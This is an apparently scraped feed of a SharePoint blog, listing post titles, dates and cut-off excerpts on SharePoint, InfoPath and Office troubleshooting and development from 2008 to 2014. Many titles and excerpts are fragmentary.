a working configuration. Enable remoting and credential pass-through You n... (More)<img src="" height="1" width="1" alt=""/> REST API not refreshing data ServicesTroubleshootingSteven Van de Craen2014-02-19T23:00:00-08:00We’re using the Excel REST API in SharePoint 2010 to visualize some graphs directly on a web page. The information is stored in an Excel workbook in a document library and that had connections to backend data stores. The connection settings inside the workbook were configured with credentials ins... (More)<img src="" height="1" width="1" alt=""/> Workflow and emailing to groups Van de Craen2014-02-19T07:08:20-08:00Nintex Workflow is able to send emails via the Send notification action. A question often asked is if it can send emails to SharePoint groups or Active Directory groups. The answer is; Yes it can! There are some things you need to know though… Send to an Active Directory group You can use AD s... (More)<img src="" height="1" width="1" alt=""/> and NAT Van de Craen2014-01-15T23:13:21-08:00Networking “challenges” I like Hyper-V. I really like it. But I’m not blind for shortcomings either. The biggest frustration for me has always been the lack of NAT. Up until now I was using ICS (Internet Connection Sharing) but this was far from perfect; » It used the same IP address range as t... (More)<img src="" height="1" width="1" alt=""/> Foundation 2013 broken search experience Van de Craen2013-12-10T02:33:41-08:00Issue I recently examined a SharePoint Foundation 2013 environment where all Search Boxes had gone missing overnight. Also, when browsing to the Search Center I received an error. The ULS logs showed the following error: System.InvalidProgramException: Common Language Runtime d... (More)<img src="" height="1" width="1" alt=""/> GroupBy ordering with calculated field 365Steven Van de Craen2013-12-06T09:16:08-08:00Something that almost every client asks me is how to change the display order of the GroupBy field in a SharePoint List. For instance, let’s say you have a grouping on a status field. Unfortunately the List Settings only allow you to sort them alphabetically, either ascending or descending. ... (More)<img src="" height="1" width="1" alt=""/> a broken People Picker in Office 2010 Van de Craen2013-11-27T12:41:04-08:00Recently I was on a troubleshooting mission in a SharePoint 2010 / Office 2010 environment where the People Picker in the Document Information Panel of Word wasn’t resolving input, nor did the address book pop up after clicking it. I fired up Fiddler to see a HTTP 500 System.ServiceModel.ServiceAct... (More)<img src="" height="1" width="1" alt=""/> SharePoint Lookup Fields Van de Craen2013-11-20T13:32:03-08:00Recently I was in an upgrade project and, as any good upgrade project, there are some kinks that needed ironing out. The issue was a corrupted list that had to be recreated and repopulated. Now there’s a challenge in that itself, but it’s not the subject of this post. Let’s just say that we recreate... (More)<img src="" height="1" width="1" alt=""/> system Content Types TypesSteven Van de Craen2013-11-07T11:22:01-08:00I was at a client recently that couldn’t access ANY of their document libraries anymore. New libraries were also affected by this. The SharePoint ULS logs kept spawning the following error: 10/18/2013 14:11:10.08 w3wp.exe (0x128C) 0x1878 SharePoint Foundation Runtime tkau Unexpected... (More)<img src="" height="1" width="1" alt=""/> the Search Service Application for a specific site (programmatically) Van de Craen2013-10-30T06:46:35-07:00IApplica... (More)<img src="" height="1" width="1" alt=""/> Forms Services and the xsi:nil in code behind ServerInfoPathOfficeSteven Van de Craen2013-10-25T05:27:35-07:00Yesterday I had the requirement to programmatically add and remove the xsi:nil attribute from an InfoPath 2010 browser form hosted in InfoPath Forms Services in SharePoint 2010. There are several solutions for adding and removing xsi:nil to be found on the internet, but I’ve found only one ... (More)<img src="" height="1" width="1" alt=""/> SharePoint Farm Solutions from the Config Database Van de Craen2013-10-18T17:03:51-07:00Why I was working on what was supposed to be a quick final-run migration from an old SharePoint 2010 farm to a new SharePoint 2010 farm. There had been a test-run and testing period so it should have gone breezy. After I shut down the SharePoint servers in the old environment I used SQL backup... (More)<img src="" height="1" width="1" alt=""/> at me Van de Craen2013-10-11T09:12:07-07:00Hey you, look at me! I’m a blog. A SharePoint blog would you believe it? Don’t I look fancy? A new design For the last few weeks the incredible Tom Van Bortel has been working on a new blog design for this blog. A task I wouldn’t dare to commit myself to, I have very little design skills. But ... (More)<img src="" height="1" width="1" alt=""/> the MySite Url broke the Activity Feed de Craen Steven2013-09-04T02:54:00-07:00Yesterday I was confronted with the issue of a changed My Site Url. The client had asked to change to. The first step is to recreate the Web Application with the new primary Url and set up IIS (certificates). You could extend but they didn't re... (More)<img src="" height="1" width="1" alt=""/> Auto SignIn Van de Craen2013-05-13T06:32:48-07:00Claims SS... (More)<img src="" height="1" width="1" alt=""/> Saturday Belgium 2013 - Claims for developers Van de Craen2013-05-04T01:02:45-07:00Last Saturday I delivered a session on “Claims for developers” at the 3rd Belgian SharePoint Saturday edition, focusing on Claims Based Authentication. It was great to see that there was a lot of interest in this topic, since it’s something that allows you to do some very cool things. It was a re... (More)<img src="" height="1" width="1" alt=""/> 2013 crashes when opening a document (SharePoint 2013) Van de Craen2013-04-17T08:32:20-07:00Since Co... (More)<img src="" height="1" width="1" alt=""/> and Claims: Map Network Drive issue Van de Craen2013-02-06T05:42:09-08:00Scenario If a SharePoint Web Application is configured with Claims Authentication, you might run into an issue when trying to map SharePoint as a network drive. If you only have Windows Authentication configured on the Zone… …you’ll be either automatically signed in or get a credential prompt... (More)<img src="" height="1" width="1" alt=""/> Development: Cannot connect to the targeted site StudioSharePointSteven Van de Craen2013-02-05T03:38:32-08:00Do you have your SharePoint 2013 / Visual Studio 2012 development environment up and running ? If so, you might encounter the following error when you create a new SharePoint Project and enter the URL to your site: Cannot connect to the targeted site. This error can occur if the specified ... (More)<img src="" height="1" width="1" alt=""/> 2013 and anonymous users accessing lists and libraries Van de Craen2013-01-26T11:41:37-08:00The ... (More)<img src="" height="1" width="1" alt=""/> migration to SharePoint 2013 - Part 2 Van de Craen2013-01-21T04:44:00-08:00Here’s a second post regarding the upgrade of my old SharePoint 2007 blog to a newer SharePoint version. Right now I’m running my blog on our new SharePoint 2013 infrastructure in SharePoint 2010 modus (deferred Site Collection upgrade). CKS:EBE I deployed the original SharePoint 2007 WSP to t... (More)<img src="" height="1" width="1" alt=""/> SharePoint - Some views not upgraded to XsltListViewWebPart Van de Craen2013-01-08T06:14:37-08:00Update 24/08/16 Revisited post: Update 16/07/13 Included the tool and source for SharePoint 2013 and expanded functionality so that yo... (More)<img src="" height="1" width="1" alt=""/> migration to SharePoint 2013 - Part 1 Van de Craen2013-01-02T13:33:19-08:00I... (More)<img src="" height="1" width="1" alt=""/> Information Management Policy: Invalid field name. Van de Craen2012-12-12T09:11:45-08:00One of our projects makes use of Information Management Policies in SharePoint Server. We were programmatically adding these policies to Content Types, but for some reason this didn’t work when we migrated the application to SharePoint 2010. Issue We receive the following error: System.Argume... (More)<img src="" height="1" width="1" alt=""/> migration issue: List does not exist Van de Craen2012-12-11T06:50:51-08:00Recently bumped into this weird issue when migrating from SharePoint 2007 to SharePoint 2010. The site collections were correctly upgraded using the DB ATTACH method. Issue A first look at the site and libraries showed no issues, but when going to the List Settings of certain libraries and lists, ... (More)<img src="" height="1" width="1" alt=""/> Data integration in Office and SharePoint using BDC or BCS Van de Craen2012-12-07T05:42:38-08:00Today I discovered a rather unpleasant change during a migration of SharePoint 2007 to SharePoint 2010. The customer is still using Office 2007 but is planning on upgrading next year. Situation In SharePoint 2007 you had Business Data Connectivity (BDC) to bring external data (think back-end syst... (More)<img src="" height="1" width="1" alt=""/> Hyper-V 3.0 machine to VMWare Workstation Van de Craen2012-12-05T05:41:00-08:00There is a lot of ink already on the subject of converting Microsoft Virtual Machines to VMWare Virtual Machines, but I’m writing down what worked for me to get it up and running. VMWare vCenter Converter Download it and install it. If you’re not carrying multiple machines then install it on your W... (More)<img src="" height="1" width="1" alt=""/> SharePoint DCOM errors the easy way Van de Craen2012-11-29T05:23:38-08:00Tagline: Fix your SharePoint DCOM issues with a single click ! Update 8/05/2014: Scripts were revised to work with Windows Server 2008 R2 and Windows Server 2012 with User Account Control enabled. Revised post: Fixing SharePoint DCOM errors the easy way - revised Direct... (More)<img src="" height="1" width="1" alt=""/> Conference 2012 Report - Mental Overload Van de Craen2012-11-14T14:17:00-08:00Share... (More)<img src="" height="1" width="1" alt=""/> Conference 2012 Report - Viva Las Vegas Van de Craen2012-11-12T07:47:00-08:00My colleague Dimitri and I got the opportunity to go to this year’s SharePoint Conference (#SPC12) in Las Vegas. I have to admit that I had mixed feelings at the beginning; I’m not much of a traveler to begin with and also leaving my wife and kids didn’t sound too appealing. But of course we’re t... (More)<img src="" height="1" width="1" alt=""/> Forms Services 2010: glitch with repeating dynamic hyperlinks Van de Craen2012-05-22T04:15:00-07:00 t... (More)<img src="" height="1" width="1" alt=""/> 8 Van de Craen2012-03-17T03:16:00-07:00A t... (More)<img src="" height="1" width="1" alt=""/> Computed Field - updated with XSL Computed FieldSharePointSteven Van de Craen2012-03-02T00:28:00-08:00Yesterday I updated the download and source code for the Advanced Computed Field at the Ventigrate Public Code Repository with an XSL stylesheet. This was needed to fix an issue with the field not rendering values when filtered through a Web Part Connection. The Advanced Computed Field relies on CA... (More)<img src="" height="1" width="1" alt=""/> Saturday Belgium 2012 Van de Craen2012-03-01T08:31:57-08:00Join SharePoint architects, developers, and other professionals on 28th April for the second Belgian ‘SharePoint Saturday’ event. SharePoint Saturday is an educational, informative & lively day filled with sessions from respected SharePoint professionals & MVPs, covering a wide variety of Sh... (More)<img src="" height="1" width="1" alt=""/> All Items Ribbon Button SolutionsRibbonjQuery/JavaScriptSteven Van de Craen2012-02-08T09:38:12-08:00A SharePoint 2010 Sandboxed Solution that adds a Ribbon Button that recycles all items in a Document Library with a single mouse click. I' have created this miniproject more as an academic exercise in creating a Ribbon Button than for real business value. It can come in handy for development enviro... (More)<img src="" height="1" width="1" alt=""/> 2010: Taxonomy issue and Event Receivers Receivers.NETTroubleshootingSteven Van de Craen2012-02-02T03:59:00-08:00Issue c... (More)<img src="" height="1" width="1" alt=""/> 2010 SOAP Service Error (The top XML element 'string'...) Van de Craen2012-01-26T05:09:00-08:00Today we were experimenting with SharePoint 2010 CSOM (Client Side Object Model) and we noticed strange errors such as HTTP ERROR 417 were returned. When browsing to Lists.asmx and Sites.asmx we got the following error: The top XML element 'string' from namespace '.... (More)<img src="" height="1" width="1" alt=""/> Server 2010 and PDF Indexing Van de Craen2012-01-05T03:22:25-08:00Posting this for personal reference: SharePoint 2010 - Configuring Adobe PDF iFilter 9 for 64-bit platforms Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office Server\14.0\Search\Setup\ContentIndexCommon\Filters\Extension\.pdf] @=hex(7):7b,00,45,00... (More)<img src="" height="1" width="1" alt=""/> 2007: Anonymous Version History Van de Craen2012-01-02T23:20:33-08:00You can configure the permission level of anonymous users to allow for viewing versions of documents and items, but no matter what you do, they get prompted for credentials. The Version History page has the property “AllowAnonymousAccess” set to false. It is a virtual property in the Microsoft.Shar... (More)<img src="" height="1" width="1" alt=""/> 2010 User Profile Page: Add as colleague–Link Fixup Van de Craen2011-12-27T02:43:00-08:00Here’s a small fix for which I didn’t have time to investigate more properly: Issue The User Profile Page of another user shows a link “Add as colleague” when that user isn’t already a colleague: It seems however that the link behind “Add as colleague” directs to the Default AAM URL rather... (More)<img src="" height="1" width="1" alt=""/>–link-fixup.aspxThe sandbox is too busy to handle the request ReceiversSandbox SolutionsSharePointTroubleshootingSteven Van de Craen2011-12-07T08:32:00-08:00SharePoint 2010 and SharePoint Online (Office 365) allow for custom development in the form of Sandbox Solutions. Your code is restricted to a subset of the SharePoint API but allows you do most regular operations inside a Site Collection. Problem Here’s a scenario that fails every time and everywh... (More)<img src="" height="1" width="1" alt=""/> - Default Library Content Type is Folder TypesSteven Van de Craen2011-10-19T05:01:55-07:00Ever Ty... (More)<img src="" height="1" width="1" alt=""/> APIs in SharePoint 2010 Service Pack 1 (SP1) Van de Craen2011-10-17T14:57:46-07:00New APIs in SharePoint 2010 Service Pack 1 (SP1) Funny enough a colleague pointed out to me he couldn’t find the UserProfile.ModifyProfilePicture method. Neither could I (running Service Pack 1 + June 11 CU). Can you ? Perhaps it was removed in the June 2011 Cumulative Update ? UPDATE (18 ... (More)<img src="" height="1" width="1" alt=""/> Administration Time Zone incorrect Van de Craen2011-10-13T05:04:16-07:00If you happen to change the Windows Time Zone settings AFTER Central Administration has been provisioned, you will see that the time zone/date format is not updated in the administration pages: Luckily, the fix is quite easy. You can just update the Regional Settings of the Central Administra... (More)<img src="" height="1" width="1" alt=""/> October 2011 Van de Craen2011-10-02T05:42:54-07:00): Stop thinking about feature... (More)<img src="" height="1" width="1" alt=""/> User Management Van de Craen2011-09-30T09:31:47-07:00This project is further maintained at the Ventigrate Codeplex Repository (). Please go there to get the latest news or for any questions regarding this topic. Page was cross-posted to this blog on 09/30/2011. External User Management The External User Manage... (More)<img src="" height="1" width="1" alt=""/> and InfoPath Promoted Fields Van de Craen2011-08-25T10:28:30-07:00A... (More)<img src="" height="1" width="1" alt=""/> Up - Programmatically approving a workflow Van de Craen2011-06-28T02:10:27-07:00In my previous post “SharePoint 2010: Programmatically Approving/Rejecting Workflow” I mentioned the possibility of an issue when programmatically altering a workflow task. I have been testing it on several SharePoint 2010 farms with different parameters (different patch level, etc). UPDATED Ju... (More)<img src="" height="1" width="1" alt=""/> 2010: Programmatically Approving/Rejecting Workflow Van de Craen2011-06-23T15:41:00-07:00Interacting with a workflow in SharePoint is relatively straight-forward if you understand the underlying process. I’ve done multiple projects in both SharePoint 2007 and SharePoint 2010 with some level of workflow interaction: starting a workflow, approving or rejecting a workflow task, or r... (More)<img src="" height="1" width="1" alt=""/> 2010: Announcing the Advanced Computed Field for SharePoint 2010 Computed FieldSharePointCustom Field TypesSteven Van de Craen2011-05-26T09:07:47-07:00Finally available: the SharePoint 2010 version of the Advanced Computed Field. Don’t know what it is ? Check this out: (the Advanced Computed Field rendering a highlighted/italic item title)<img src="" height="1" width="1" alt=""/> issues with DispForm, EditForm and NewForm Van de Craen2011-03-11T10:17:00-08:00Each SharePoint List can be altered with a custom DispForm.aspx, EditForm.aspx and NewForm.aspx to display, edit or create list items and metadata. This post is about restoring them to a working point. Botched Forms So one of these forms are edited to a loss state or deleted altogether. If this is ... (More)<img src="" height="1" width="1" alt=""/> Forms Server 2010 Parameterized Submit issue ServerSharePointTroubleshootingSteven Van de Craen2011-03-09T05:16:00-08:00I’m currently testing our InfoPath Web Forms for an upcoming migration to InfoPath 2010 and SharePoint 2010 and have come up with a reproducible issue. Issue InfoPath Web Forms cannot use values from other Data Sources as parameters in a Submit Data Connection. When the form is submitted a warning ... (More)<img src="" height="1" width="1" alt=""/> URL Changes and InfoPath Forms ServerSteven Van de Craen2011-03-08T02:28:18-08:00InfoPath Form Template URL ou... (More)<img src="" height="1" width="1" alt=""/>: SPWeb.Properties versus SPWeb.AllProperties SolutionsSteven Van de Craen2011-03-05T23:41:18-08:00Property Bag SPWeb exposes two ways of interacting with the property bag: SPWeb.Properties exposes a Microsoft.SharePoint.Utilities.SPPropertyBag SPWeb.AllProperties exposes a System.Collections.Hashtable The former is considered legacy, also it stores the Key value as lowercase, whi... (More)<img src="" height="1" width="1" alt=""/> 2010: Content Type Syndication experiments TypesSharePointSteven Van de Craen2011-03-05T04:40:47-08:00In my post yesterday I raised the question about Content Type syndication using the Content Type Hub mechanism, and how this would work together with Lookup Fields, since they don’t support crossing Site Collection boundaries. Another question is in regard to the “challenges” of using OOXML (docx, ... (More)<img src="" height="1" width="1" alt=""/> Lookup Field Types: migration from 2007 to 2010 Field TypesSteven Van de Craen2011-03-04T09:23:31-08:00Custom Field Types are a rather advanced topic, but very powerful as well. They allow for real integration of custom components inside standard List and Library rendering. (See my other posts on Custom Field Types) There are some things you can run into. Especially if you have custom Lookup Field T... (More)<img src="" height="1" width="1" alt=""/> multiple credential prompts for Office in combination with SharePoint Van de Craen2011-02-22T02:39:00-08:00I had seen and tried most of this already, but didn’t know the Network Location bit: Multiple Authentication (login) Prompts - Office Products with SharePoint<img src="" height="1" width="1" alt=""/> Policy For Web Application: Account operates as System Van de Craen2011-02-12T02:58:02-08:00Both... (More)<img src="" height="1" width="1" alt=""/> 2010: Increase debugging time by configuring Health Monitoring Van de Craen2011-02-06T09:51:43-08:00If incr... (More)<img src="" height="1" width="1" alt=""/> Content Productivity Hub 2010 - updated Van de Craen2011-01-18T09:31:43-08:00Recently updated: the Productivity Hub The Productivity Hub is a Microsoft SharePoint Server 2010 site collection that offers training materials for end-users. The Hub is a SharePoint Server site collection that serves as a learning community and is fully customizable. It provides a centr... (More)<img src="" height="1" width="1" alt=""/> 2007 and the mysterious ever required field TypesSharePointSteven Van de Craen2011-01-06T09:47:59-08:00Today is trouble solving day at a customer. One of the issues was a SharePoint Library on their Intranet having a required field, even though Require that this column contains information was set to “No”. So I opened up SharePoint Manager 2007 to inspect the SchemaXml: <Field Name="... (More)<img src="" height="1" width="1" alt=""/> 2008 R2 unable to connect to locally shared folder Van de Craen2011-01-05T07:22:44-08:00... (More)<img src="" height="1" width="1" alt=""/> Office Web Applications for an Upgrade (a day of agony) Web ApplicationsSharePointSteven Van de Craen2011-01-04T02:51:21-08:00Yesterday... (More)<img src="" height="1" width="1" alt=""/> Live Writer Twitter Plug-in with OAuth Van de Craen2010-11-25T01:29:55-08:00Since the introduction of OAuth in Twitter the Twitter Plug-in for Windows Live Writer to tweet new blog posts stopped working. A while back an update was released that works with the new authentication scheme. (This post is really for testing if it works correctly :))<img src="" height="1" width="1" alt=""/> Library Thumbnail Size Van de Craen2010-11-23T05:10:32-08:00Today I was looking into a way to increase the Thumbnail size of slides in a Slide Library (MOSS 2007, SharePoint Server 2010). The SPPictureLibrary has a ThumbnailSize property which you can set, but this is not available for a slide library. So I tried reflection on an SPList to update the relat... (More)<img src="" height="1" width="1" alt=""/>: Slide Library and Folders Van de Craen2010-10-11T05:54:35-07:00The Slide Library is available in MOSS 2007 and SharePoint Server 2010 and allows to upload several slides from a PowerPoint Presentation as separate slides. Then it is really easy to compose a new presentation based on slides you select from the library. Working with folders in Slide Libraries is ... (More)<img src="" height="1" width="1" alt=""/> to Windows Token Service Van de Craen2010-10-07T07:48:50-07:00In SharePoint 2010 the Claims To Windows Token Service (c2wts) is a very nice addition that allows for conversion of claims credentials to windows tokens. The service is required to run as the LocalSystem account. If you –like me- have accidentally switched it to a specific user there’s no way in t... (More)<img src="" height="1" width="1" alt=""/> for my colleagues Van de Craen2010-09-27T15:00:52-07:00Another colleague of mine has started his blog on. And don’t be fooled by the host name, it’s for posts on SharePoint 2010 as well !! Find them here and add them to your feed readers :) Tom Van Rousselt: Sebastian Bouckaert... (More)<img src="" height="1" width="1" alt=""/> 2010: User cannot be found after using stsadm migrateuser ReceiversSharePointTroubleshootingSteven Van de Craen2010-09-07T13:18:00-07:00I. Aft... (More)<img src="" height="1" width="1" alt=""/> 2010 exams behind me Van de Craen2010-09-01T12:50:52-07:00I decided to have a go on the SharePoint 2010 exams with little or no preparation and see how it’d go. The first three went smoothly. I have to admin I struggled somewhat with the PRO Administrator exam today, but cleared it nevertheless. Exam 70-573: TS: Microsoft SharePoint 2010, Appli... (More)<img src="" height="1" width="1" alt=""/> Event Receivers and HttpContext ReceiversSharePointSteven Van de Craen2010-08-24T13:49:51-07:00A lesser known trick to make use of the HttpContext in asynchronous Event Receivers in SharePoint 2007 or SharePoint 2010 is to define a constructor on the Event Receiver class that assigns the HttpContext to an internal or private member variable. Next you can access it from the method overrides fo... (More)<img src="" height="1" width="1" alt=""/> Web Apps - creating new documents Web ApplicationsOfficeSharePointSteven Van de Craen2010-08-16T02:24:00-07:00The Office Web Apps allow users without Microsoft Office installed to display or work on Word, Excel or PowerPoint files from the browser. It is a separate installation to your SharePoint Farm and controllable by two Site Collection Features: When active it will render Office 2007/2010 file f... (More)<img src="" height="1" width="1" alt=""/> 2010 and Remote Blob Storage for better file versioning Van de Craen2010-08-06T07:37:53-07:00A feature of using the Remote Blob Storage with SharePoint 2010 (FILESTREAM provider in SQL Server 2008) is that document versions do not always create a new full copy of the original file, as it would in a non-RBS environment. This is a huge improvement since 5 versions of a 10 MB file where only ... (More)<img src="" height="1" width="1" alt=""/> 2010: June 2010 Cumulative Update UpdatesSharePointSteven Van de Craen2010-07-31T05:23:06-07:00Spreading the news… The first Cumulative Update (called “June 2010 CU”) for SharePoint 2010 was made available a few days ago: SharePoint Foundation 2010 KB 2028568 – Download SharePoint Server 2010 KB 983319 – Download KB 983497 – Download KB 2182938 – Do... (More)<img src="" height="1" width="1" alt=""/> upgraded to CKS:EBE 3.0 Van de Craen2010-07-24T05:40:00-07:00The smart people behind the Community Kit for SharePoint have released 3.0 of the Enhanced Blog Edition. Check out the improvements it brings: Cheers !<img src="" height="1" width="1" alt=""/> 2010 Development: Replaceable Tokens Van de Craen2010-07-24T04:19:00-07:00Quick reference: (Source:) Name Description $SharePoint.Project.FileName$ The name of the containing project file, such as, "NewProj.csproj". $SharePoint.Project.FileNameWithoutExtension$ The name of the containing p... (More)<img src="" height="1" width="1" alt=""/> Page Home Page Van de Craen2010-07-19T02:15:00-07:00In SharePoint Server 2010 you have the option to create an Enterprise Wiki, but what if you have SharePoint Foundation 2010 or Search Server 2010 and you want to create a Wiki site ? You’ll notice that there’s no Wiki Site Template available like in SharePoint 2007 but nowadays you can activate Wik... (More)<img src="" height="1" width="1" alt=""/> availability Van de Craen2010-06-25T09:26:02-07:00There have been a lot of issues recently on the availability of my blog. This is because we’re currently cleaning out the server room with old servers and virtualizing them. In that process some of the IP addresses got mixed around and of course the ISA rules were not updated yet. Apologies for tha... (More)<img src="" height="1" width="1" alt=""/> language of the Spell Check in MOSS 2007 Van de Craen2010-06-04T06:46:00-07:00Want a quick way to change the language of the Spell Check for publishing pages in MOSS 2007 ? Place this script in your masterpage to set the language parameter before the call to the SpellCheck Web Service is made… <script type="text/javascript"> L_Language_Text = 100c; &l... (More)<img src="" height="1" width="1" alt=""/> | SPSaturday: wrap up SolutionsSharePointSteven Van de Craen2010-05-12T01:49:00-07:00Last Saturday (8 May 2010) the first SharePoint Saturday event in Belgium took place. It was a day full of SharePoint 2010 aimed specifically at developers. As promised here’s the slide deck and demo files I used. Slide deck Demo1: creating a sandboxed web part Demo2: display sandbox res... (More)<img src="" height="1" width="1" alt=""/> 2010 Protected View and SharePoint Van de Craen2010-05-10T03:00:00-07:00If envir... (More)<img src="" height="1" width="1" alt=""/> Saturday coming near you on May 8th ! Van de Craen2010-03-30T02:22:00-07:00BIWUG is organizing the first SharePoint Saturday in Belgium ever. It’s held in Hof Ter Elst, Edegem on the 8th of May 2010. Topics include Visual Studio 2010 Tools, LINQ to SharePoint, Client Object Model, Sandbox solutions, Managed Metadata and WCF and REST in SharePoint. I’ll be there presenti... (More)<img src="" height="1" width="1" alt=""/> Search Scopes: Approximate Item Count is incorrect Van de Craen2010-03-18T08:28:00-07:00The playe... (More)<img src="" height="1" width="1" alt=""/> is back in the air Van de Craen2010-03-17T06:11:00-07:00It took about a week to resolve the DNS issue but now this site is back online to provide you with the occasional posting on SharePoint, .NET, Silverlight and alike. Regards, Steven<img src="" height="1" width="1" alt=""/> does SharePoint know the Content Type of an InfoPath form saved to a document library ? TypesInfoPathSharePointSteven Van de Craen2010-03-10T12:13:00-08:00When” att... (More)<img src="" height="1" width="1" alt=""/> pages to meeting workspaces programmatically Van de Craen2010-03-10T12:13:00-08:00You ... (More)<img src="" height="1" width="1" alt=""/> 2007 document templates and Content Types in SharePoint – lessons learned TypesDebuggingOfficeSharePointSteven Van de Craen2010-01-29T07:09:00-08:00A while ago I stumbled upon a serious design limitation regarding Content Types and centralized document templates. What then followed was a series of testing, phone calls with Microsoft, finding alternative solutions and deep dive into Office Open XML. Request from the customer “We want to use MOSS... (More)<img src="" height="1" width="1" alt=""/>-–-lessons-learned.aspxProgrammatically change the Toolbar on a List View Web Part Van de Craen2010-01-28T05:31:00-08:00A refresher c... (More)<img src="" height="1" width="1" alt=""/> + serialize an InfoPath Form loses the processing instructions ServerInfoPathSteven Van de Craen2010-01-21T09:16:00-08:00Using)... (More)<img src="" height="1" width="1" alt=""/> Search indexes some files with fldXXXX_XXXX file names UpdatesSteven Van de Craen2010-01-20T08:00:00-08:00Today som... (More)<img src="" height="1" width="1" alt=""/> Word 2007 Content Controls with empty Placeholder Text Van de Craen2009-12-03T09:03:00-08:00Word 2007 uses Content Controls to display document fields inside the document (eg. the header). These document fields can be standard fields but also your SharePoint Fields. By default when the value of a Content Control is empty it will display the Placeholder Text between square brackets as foll... (More)<img src="" height="1" width="1" alt=""/> in SharePoint Van de Craen2009-11-12T03:58:00-08:00Recently stumbled upon this old article: Microsoft Office Thumbnails in SharePoint.Has anyone actually done anything like this ?<img src="" height="1" width="1" alt=""/> and screen manipulation flickering Van de Craen2009-11-09T06:43:00-08:00We hap... (More)<img src="" height="1" width="1" alt=""/> Formatting using the Advanced Computed Field Computed FieldSharePointCustom Field TypesSteven Van de Craen2009-11-07T03:31:00-08:00I got a question on how to use the Advanced Computed Field for conditional formatting and when I finished writing up the response I figured I might as well share it with the community, being you all :) Here’s the config I used: <FieldRefs> <FieldRef Name="TestField" /&g... (More)<img src="" height="1" width="1" alt=""/> Edit Mode doesn’t trigger an update Van de Craen2009-10-26T15:14:00-07:00Funny thing last week when I wrote a “Page Information Web Part” (something that showed something like ‘This page was last modified by X on Y’) and it didn’t update at all when Web Parts were added, modified or deleted. I can see why it wouldn’t but I still think this is a flaw because there’s no w... (More)<img src="" height="1" width="1" alt=""/>’t-trigger-an-update.aspxRooms and Equipment Reservations: Consistency Check Web Part Van de Craen2009-10-26T14:54:00-07:00Still flaw... (More)<img src="" height="1" width="1" alt=""/> on list item body using jQuery Field TypesjQuery/JavaScriptSharePointAdvanced Computed FieldSteven Van de Craen2009-10-01T15:35:00-07:00A... (More)<img src="" height="1" width="1" alt=""/> Search for MOSS 2007 Van de Craen2009-09-23T10:43:00-07:00Wild Ale... (More)<img src="" height="1" width="1" alt=""/> Document Templates in a library: Document Information Panel shows incorrect properties TypesOfficeSharePointSteven Van de Craen2009-08-20T02:56:00-07:00Every th... (More)<img src="" height="1" width="1" alt=""/> Types cannot be created declaratively on a child web Van de Craen2009-08-07T06:23:00-07:00One can easily create a Content Type on a child web through the SharePoint interface. One can easily create a Content Type on a child web through the SharePoint Object Model. One cannot create a Content Type on a child web through a Feature declaratively (you could create it through ... (More)<img src="" height="1" width="1" alt=""/> 2007 SP2 fixed activation issue UpdatesSteven Van de Craen2009-08-04T02:12:00-07:00The download for SharePoint 2007 SP2 has been updated to no longer change your environment to trial mode. More on this here:<img src="" height="1" width="1" alt=""/>: Someone changes an item that appears in the following view Van de Craen2009-07-27T04:33:00-07:00Recently I was asked how to receive notifications when specific metadata for an item changed. I recalled this was somehow possible with the out of the box Alerts and then configure them to send a notification when something to the View changed. “This feature is not available when I create an aler... (More)<img src="" height="1" width="1" alt=""/> on Win7 RC: issues with OWA 2007 ServerGeneralInternet ExplorerWindowsSteven Van de Craen2009-07-22T13:48:00-07:00I would have preferred if Win7 RTM came sooner so that I could avoid migrating from Beta to RC and then from RC to RTM but no point to keep on whining about it :) So I decided to install the 64 bit issue of Windows 7 Release Candidate. I love how smooth those Win7 installs are. Very little inte... (More)<img src="" height="1" width="1" alt=""/> Receiver Definition: Data and Filter TypesEvent ReceiversSharePointSteven Van de Craen2009-06-30T04:05:00-07:00I recently declared an Event Receiver through a SharePoint Feature: Event Registrations Some of the samples online had surprising elements such as <Data /> and <Filter />. I have never seen them used before and didn’t know their purpose. Perhaps they are not to be messed with ? Per... (More)<img src="" height="1" width="1" alt=""/> and Structure Reports troubleshooting Site QuerySteven Van de Craen2009-06-29T14:30:00-07:00If you have MOSS 2007 than you get the Site Manager for advanced management and with it the “Content and Structure Reports” (http://<server>/Reports List). You can easily display the results of a report through the Site Actions menu. You can also add custom reports since the underlying t... (More)<img src="" height="1" width="1" alt=""/> Receivers on Content Types TypesEvent ReceiversSteven Van de Craen2009-05-07T10:06:00-07:00I'm currently doing quite some research on Event Receivers (ERs) on Content Types (CTs) and activating those CTs on a document library in SharePoint 2007 (WSS 3.0 to be exact, but same applies for MOSS 2007 and MSS(X) 2008). The setup is a single document library with the out of the box Document C... (More)<img src="" height="1" width="1" alt=""/> 2007: Update system properties (Created, Created By, Modified, Modified By) Van de Craen2009-04-13T07:09:00-07:00The system metadata can be changed to any value desired using the object model. I did notice a bug that the "Created By” (aka Author) field wouldn’t update unless also the “Modified By” (aka Editor) field was set (either to a new or it’s current value). SPListItem item = ...; item[“Created By... (More)<img src="" height="1" width="1" alt=""/> Renewal 2009 Van de Craen2009-04-01T11:12:00-07:00I’m so happy I get to be a SharePoint MVP for another year ! The email arrived only two hours ago and I really wasn’t convinced of my renewal but nevertheless it is a fact. Also congrats to all the other guys and gals thathave gotten their renewal !! Steven <img src="" height="1" width="1" alt=""/> Computed Field Field TypesAdvanced Computed FieldSteven Van de Craen2009-03-31T14:34:00-07:00Introduction This project originally started as ‘TitleLinkField’ because I needed a way to display the Title field as a hyperlink to the document in a document library, but it ended up being more than just that so I chose a more generic name for it. I had some experience with Custom Field Type... (More)<img src="" height="1" width="1" alt=""/> custom document properties on a file share Van de Craen2009-01-08T04:06:00-08:00A file share with Word and Excel documents (.doc, .docx, .xls, .xlsx) having custom document properties is indexed via MOSS 2007 or MSS 2008. When the crawl has finished the custom properties are listed in 'Crawled properties' but the details view mentions "There are zero documents in the in... (More)<img src="" height="1" width="1" alt=""/> 2007: December Update ServicesForms ServerSharePointSharePoint UpdatesSteven Van de Craen2008-12-29T04:16:00-08:00This update really combines all previous updates so installation order is simplified. WSS SP1 (+ for all language packs) MOSS SP1 (+for all language packs) WSS December Update: x86 - x64 (separate downloads !) MOSS December Update: x86 - x64 (separate downloads !) More info about that here... (More)<img src="" height="1" width="1" alt=""/> permissions: 'Only their own' Van de Craen2008-12-19T08:36:00-08:00The title of this blog post is referring to this screen in the List Settings: It interests me because it allows you to control ownership of the item is only available to Lists but not to Document Libraries doesn't use unique permissions but some other mechanism One thing it mentions is th... (More)<img src="" height="1" width="1" alt=""/> 2007 Event Receiver and Enterprise Library: TargetInvocationException ReceiversSteven Van de 